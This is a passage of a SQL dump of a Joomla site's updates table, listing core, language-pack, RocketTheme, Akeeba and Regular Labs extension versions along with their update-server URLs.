Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(24210,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(24211,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24212,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24213,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24214,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24215,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24216,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24217,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24218,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24219,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24220,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24221,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24222,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24223,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24224,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24225,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24226,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24227,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24228,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24229,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24230,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24231,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24232,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24233,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24234,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24235,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24236,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24237,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24238,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24239,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24240,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24241,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24242,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24243,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24244,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24245,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24246,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24247,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24248,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24249,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24250,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24251,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24252,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24253,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24254,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24255,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24256,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24257,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24258,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24259,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24260,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24261,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(24262,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(24263,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(24264,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24265,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24266,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24267,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24268,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24269,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24270,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24271,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24272,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24273,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24274,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24275,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24276,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24277,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24278,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24279,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24280,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24281,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24282,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24283,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24284,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24285,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24286,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24287,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24288,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24289,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24290,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24291,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24292,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24293,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24294,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24295,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24296,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24297,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24298,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24299,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24300,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24301,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24302,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24303,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24304,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24305,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24306,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24307,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24308,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24309,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24310,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24311,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24312,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24313,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24314,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24315,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24316,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24317,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24318,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24319,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24320,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(24321,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(24322,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(24323,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(24324,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(24325,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(24326,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(24327,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(24328,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(24329,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24330,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24331,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24332,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24333,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24334,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24335,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24336,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24337,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24338,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24339,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24340,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24341,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24342,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24343,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24344,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24345,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24346,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24347,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24348,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24349,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24350,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24351,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24352,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24353,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24354,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24355,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24356,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24357,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24358,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24359,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24360,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24361,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24362,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24363,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24364,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24365,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24366,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24367,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24368,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24369,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24370,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24371,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24372,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24373,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24374,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24375,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24376,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24377,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24378,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24379,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(24380,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(24381,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(24382,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24383,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24384,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24385,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24386,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24387,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24388,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24389,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24390,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24391,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24392,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24393,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24394,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24395,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24396,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24397,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24398,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24399,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24400,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24401,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24402,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24403,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24404,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24405,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24406,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24407,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24408,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24409,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24410,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24411,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24412,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24413,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24414,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24415,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24416,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24417,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24418,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24419,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24420,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24421,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24422,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24423,3,0,'Portuguese 